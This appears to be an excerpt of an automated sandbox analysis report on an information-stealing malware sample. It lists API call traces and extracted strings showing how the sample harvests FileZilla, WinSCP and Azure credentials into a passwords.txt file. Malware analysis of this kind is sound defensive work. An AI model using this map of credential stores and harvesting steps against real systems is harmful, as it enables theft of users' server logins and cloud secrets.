                                              • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F215
                                              • strcpy_s.MSVCRT ref: 0040F239
                                              • GetProcessHeap.KERNEL32(00000000,?,00000001,00000000,00000001,00000000,?,?,00000000), ref: 0040F262
                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F269
                                              • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F26E
                                              • GetProcessHeap.KERNEL32(00000008,00000001,?,?,?,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F279
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F280
                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F291
                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F298
                                              • strcpy_s.MSVCRT ref: 0040F2A6
                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0040F2B2
                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,750A5460), ref: 0040F2B9
                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0040F2DF
                                              • HeapFree.KERNEL32(00000000), ref: 0040F2E6
                                              • GetProcessHeap.KERNEL32(00000008,00000010), ref: 0040F2ED
                                              • HeapAlloc.KERNEL32(00000000), ref: 0040F2F4
                                              • strcpy_s.MSVCRT ref: 0040F30C
                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0040F31D
                                              • HeapFree.KERNEL32(00000000), ref: 0040F324
                                              • strlen.MSVCRT ref: 0040F372
                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0040F3B6
                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,750A5460), ref: 0040F3BD
                                                • Part of subcall function 0040EE86: strchr.MSVCRT ref: 0040EEE5
                                                • Part of subcall function 0040EE86: lstrlenA.KERNEL32(?), ref: 0040EF03
                                                • Part of subcall function 0040EE86: GetProcessHeap.KERNEL32(00000008,-00000001), ref: 0040EF10
                                                • Part of subcall function 0040EE86: HeapAlloc.KERNEL32(00000000), ref: 0040EF17
                                                • Part of subcall function 0040EE86: strcpy_s.MSVCRT ref: 0040EF52
                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0040F409
                                              • HeapFree.KERNEL32(00000000), ref: 0040F410
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$Process$Free$Allocstrcpy_s$lstrlen$H_prologstrchrstrlen
                                              • String ID:
                                              • API String ID: 2599614518-0
                                              • Opcode ID: ae879d77a672600910af0cff755b704dd1f8243dd716ba1ff70db9919d7879d5
                                              • Instruction ID: b1bcedb0f62315078290495aff4db1c8677b25131678ed98aef8cb3aae5a226f
                                              • Opcode Fuzzy Hash: ae879d77a672600910af0cff755b704dd1f8243dd716ba1ff70db9919d7879d5
                                              • Instruction Fuzzy Hash: 7BE128B1C00219ABCF10AFE1DD499EEBB79FB09304F10483AF606B6291DB794A54DB65
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 0040C873
                                                • Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735
                                                • Part of subcall function 00411B09: SHGetFolderPathA.SHELL32(00000000,lB,00000000,00000000,?), ref: 00411B3A
                                                • Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
                                                • Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
                                                • Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B
                                                • Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802
                                                • Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
                                                • Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
                                                • Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
                                                • Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3
                                                • Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768
                                                • Part of subcall function 00406CC8: _EH_prolog.MSVCRT ref: 00406CCD
                                                • Part of subcall function 00406CC8: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406CF0
                                                • Part of subcall function 00406CC8: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406D07
                                                • Part of subcall function 00406CC8: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D23
                                                • Part of subcall function 00406CC8: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D3D
                                                • Part of subcall function 00406CC8: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406D5E
                                                • Part of subcall function 00411B55: LocalAlloc.KERNEL32(00000040,?,000000C8,00000001,?,00413F3B,00000000,00000000), ref: 00411B6E
                                              • strtok_s.MSVCRT ref: 0040C951
                                              • GetProcessHeap.KERNEL32(00000000,000F423F,00426CF2,00426CEF,00426CEE,00426CEB), ref: 0040C9A5
                                              • HeapAlloc.KERNEL32(00000000), ref: 0040C9AC
                                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040C9C0
                                              • lstrlenA.KERNEL32(00000000), ref: 0040C9CB
                                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040CA03
                                              • lstrlenA.KERNEL32(00000000), ref: 0040CA0E
                                              • StrStrA.SHLWAPI(00000000,<User>), ref: 0040CA4C
                                              • lstrlenA.KERNEL32(00000000), ref: 0040CA57
                                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040CA95
                                              • lstrlenA.KERNEL32(00000000), ref: 0040CAA4
                                              • lstrlenA.KERNEL32(?), ref: 0040CC9F
                                                • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                • Part of subcall function 00415865: _EH_prolog.MSVCRT ref: 0041586A
                                                • Part of subcall function 00415865: CreateThread.KERNEL32(00000000,00000000,00414052,?,00000000,00000000), ref: 00415910
                                                • Part of subcall function 00415865: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00415918
                                              • memset.MSVCRT ref: 0040CCF2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: H_prologlstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitmemsetstrtok_s
                                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
                                              • API String ID: 486015307-935134978
                                              • Opcode ID: 5ced818158ca7a55433ed9b2822ddbf731028b9e2dee3b4240ec5cd35ba65ed1
                                              • Instruction ID: f6fda4509a15e87aaadaa82135121b64b41e625f269fd3aaebbcf0f1521a0504
                                              • Opcode Fuzzy Hash: 5ced818158ca7a55433ed9b2822ddbf731028b9e2dee3b4240ec5cd35ba65ed1
                                              • Instruction Fuzzy Hash: 65E19131900158EADB05FBE1DD4AEEEBB78AF15304F50405AF515B21D2EFB81AC8CB69
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 0040F43F
                                              • memset.MSVCRT ref: 0040F468
                                              • memset.MSVCRT ref: 0040F488
                                              • memset.MSVCRT ref: 0040F49C
                                              • memset.MSVCRT ref: 0040F4B0
                                              • memset.MSVCRT ref: 0040F4BF
                                              • memset.MSVCRT ref: 0040F4CD
                                              • memset.MSVCRT ref: 0040F4DE
                                              • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?), ref: 0040F506
                                              • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040F52E
                                              • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?), ref: 0040F575
                                              • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040F592
                                              • RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,00000000,?,Host: ,00000000,?,Soft: WinSCP,00426CE6), ref: 0040F624
                                              • RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,00000000,?,?), ref: 0040F676
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: memset$Value$Open$EnumH_prolog
                                              • String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                              • API String ID: 784052110-2798830873
                                              • Opcode ID: 7364f70e8fa613d41563274cb42329e6bf380b4ce7c15df2a78df795435f3651
                                              • Instruction ID: b5677f6b273411974c0642e7d468d751c5b9a982ece1f2e5d055b2527304d1f9
                                              • Opcode Fuzzy Hash: 7364f70e8fa613d41563274cb42329e6bf380b4ce7c15df2a78df795435f3651
                                              • Instruction Fuzzy Hash: E7F130B1D0015EAEDB11EBA4CC85FEEB77CAF14308F1441ABE515B2182DB785B88CB65
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 00408F21
                                                • Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735
                                                • Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
                                                • Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
                                                • Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B
                                                • Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802
                                                • Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
                                                • Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
                                                • Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
                                                • Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3
                                                • Part of subcall function 00411944: _EH_prolog.MSVCRT ref: 00411949
                                                • Part of subcall function 00411944: GetSystemTime.KERNEL32(?,004274F0,00000001,000000C8,00000000,0042770F), ref: 00411989
                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?,?,?,?), ref: 0040910D
                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?), ref: 00409115
                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?), ref: 00409121
                                              • ??_U@YAPAXI@Z.MSVCRT ref: 0040912B
                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,?), ref: 0040913C
                                              • GetProcessHeap.KERNEL32(00000000,000F423F,?,?,?,?,?), ref: 00409148
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 0040914F
                                              • StrStrA.SHLWAPI(?,?,?,?,?,?), ref: 00409161
                                              • StrStrA.SHLWAPI(-00000010,?,?,?,?,?), ref: 0040917B
                                              • lstrcat.KERNEL32(00000000), ref: 0040918F
                                              • lstrcat.KERNEL32(00000000,00000000), ref: 004091A1
                                              • lstrcat.KERNEL32(00000000,00426DF8), ref: 004091AF
                                              • lstrcat.KERNEL32(00000000,00000000), ref: 004091C1
                                              • lstrcat.KERNEL32(00000000,00426DFC), ref: 004091CF
                                              • lstrcat.KERNEL32(00000000), ref: 004091DE
                                              • lstrcat.KERNEL32(00000000,-00000010), ref: 004091E8
                                              • lstrcat.KERNEL32(00000000,00426E00), ref: 004091F6
                                              • StrStrA.SHLWAPI(-000000FE,?,?,?,?,?), ref: 00409206
                                              • StrStrA.SHLWAPI(00000014,?,?,?,?,?), ref: 00409216
                                              • lstrcat.KERNEL32(00000000), ref: 0040922A
                                                • Part of subcall function 00408E1E: memset.MSVCRT ref: 00408E45
                                                • Part of subcall function 00408E1E: lstrlenA.KERNEL32(?,00000001,?,00409236,00000000,00000000,00000000,?,00409236,00000014,?,?,?,?,?), ref: 00408E5F
                                                • Part of subcall function 00408E1E: CryptStringToBinaryA.CRYPT32(?,00000000,?,00409236,00000014), ref: 00408E69
                                                • Part of subcall function 00408E1E: memcpy.MSVCRT ref: 00408ED1
                                              • lstrcat.KERNEL32(00000000,00000000), ref: 0040923B
                                              • lstrcat.KERNEL32(00000000,00426E04), ref: 00409249
                                              • StrStrA.SHLWAPI(-000000FE,?,?,?,?,?), ref: 00409259
                                              • StrStrA.SHLWAPI(00000014,?,?,?,?,?), ref: 00409269
                                              • lstrcat.KERNEL32(00000000), ref: 0040927D
                                                • Part of subcall function 00408E1E: lstrcat.KERNEL32(00426C33,00426C37), ref: 00408EF8
                                                • Part of subcall function 00408E1E: lstrcat.KERNEL32(00426C33,00426C3A), ref: 00408F10
                                              • lstrcat.KERNEL32(00000000,00000000), ref: 0040928E
                                              • lstrcat.KERNEL32(00000000,00426E08), ref: 0040929C
                                              • lstrcat.KERNEL32(00000000,00426E0C), ref: 004092AA
                                              • StrStrA.SHLWAPI(-000000FE,?,?,?,?,?), ref: 004092BA
                                              • lstrlenA.KERNEL32(00000000,?,?,?,?,?), ref: 004092D0
                                              • memset.MSVCRT ref: 00409323
                                              • CloseHandle.KERNEL32(00000000), ref: 0040932C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$FileH_prologlstrcpy$lstrlen$HeapPointermemset$AllocBinaryCloseCryptHandleProcessReadSizeStringSystemTimememcpy
                                              • String ID: passwords.txt
                                              • API String ID: 2185899561-347816968
                                              • Opcode ID: f37a83ad93c3daa73caae49ae7666c56f0765222c749063f561d64b1d4eee5ad
                                              • Instruction ID: aecd699fdd7afff7b88a06e35911a32918640e3bdf88133368cfafc8b1d2154c
                                              • Opcode Fuzzy Hash: f37a83ad93c3daa73caae49ae7666c56f0765222c749063f561d64b1d4eee5ad
                                              • Instruction Fuzzy Hash: 89D1A071800149EFDB01EBE5DD59AEE7F7ABF1A304F10401EF511A31A2DB781A88CB65
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressProc$LibraryLoad
                                              • String ID: kernel32.dll
                                              • API String ID: 2238633743-1793498882
                                              • Opcode ID: 08a055ab39353d24183d7840be85a79817b29fbf8eab7748d78734f7432d51fe
                                              • Instruction ID: 261ffebea164b3061a7af474a2a3b6216d6c60d22a1ed652357b1e11fa401551
                                              • Opcode Fuzzy Hash: 08a055ab39353d24183d7840be85a79817b29fbf8eab7748d78734f7432d51fe
                                              • Instruction Fuzzy Hash: 4F713C7D490284EFEB565F61FD689653BB7F70B701300602AEA198B630EB3148E9EF54
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ,%.*s$Auxiliary rtree columns must be last$CREATE TABLE x(%.*s INT$_node
                                              • API String ID: 0-209218429
                                              • Opcode ID: 88db3ebc48b0bbb4d1e62b85c10113d7f5afb927c1d1506072ad47a5dec82a6e
                                              • Instruction ID: 91654ce7baa28de60bd120b238829c7948f35c830ee6df0eb7c99753d6f8952d
                                              • Opcode Fuzzy Hash: 88db3ebc48b0bbb4d1e62b85c10113d7f5afb927c1d1506072ad47a5dec82a6e
                                              • Instruction Fuzzy Hash: C2F1F1B45043069FDB108F28CC85ADBBBE8FF44754F04042AFD8A97251DB36E959CBA6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ,%s$CREATE TABLE x(_shape$_node
                                              • API String ID: 0-1242591684
                                              • Opcode ID: dc8f23a8e3d220419fe97449d621048dcebc7f0aed8f91f9d5937cbdba0673f2
                                              • Instruction ID: eee0e084c435dd3f184f74c60c52aaddcf2fe7241907d477a2bc9e68ce88278e
                                              • Opcode Fuzzy Hash: dc8f23a8e3d220419fe97449d621048dcebc7f0aed8f91f9d5937cbdba0673f2
                                              • Instruction Fuzzy Hash: 2AC101B45403029BDB108F25CC89BDB77F8FF44748F480179F98A86252EB36E559CBA5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %.16g$%.18s-%s$%c%u$%lld$%s(%d)$(blob)$,%s%s%s$BINARY$NULL$k(%d$program$vtab:%p
                                              • API String ID: 0-900822179
                                              • Opcode ID: 7db51b31378ccaeb1ce1a2dea8cdaad233f329e3948512a8650f4b5b77349785
                                              • Instruction ID: 8a3a6cd155ead104c99a1ccc64753dd39d688d33b8e351b6065047d131e8e370
                                              • Opcode Fuzzy Hash: 7db51b31378ccaeb1ce1a2dea8cdaad233f329e3948512a8650f4b5b77349785
                                              • Instruction Fuzzy Hash: 6E91CD719083459BCB04CF14D880BEE77E6EF85784F54888CF989DB352D732E94A97A2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
                                              • API String ID: 0-449611708
                                              • Opcode ID: 1385514c720fe6d117b49decceade1f259b73df590f6adeb2cb520c896bedf38
                                              • Instruction ID: a502912201aee55867b647ebad271ea1509e326cd134485f0a53ff520358356c
                                              • Opcode Fuzzy Hash: 1385514c720fe6d117b49decceade1f259b73df590f6adeb2cb520c896bedf38
                                              • Instruction Fuzzy Hash: 835129F4A443126FEA105E65BCC5FDF36A8AF34A59F040035FD48A2342E768E529C2B6
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 00417BC5
                                              • memset.MSVCRT ref: 00417BE5
                                                • Part of subcall function 00411B09: SHGetFolderPathA.SHELL32(00000000,lB,00000000,00000000,?), ref: 00411B3A
                                              • lstrcat.KERNEL32(?,00000000), ref: 00417C0B
                                              • lstrcat.KERNEL32(?,\.azure\), ref: 00417C28
                                                • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
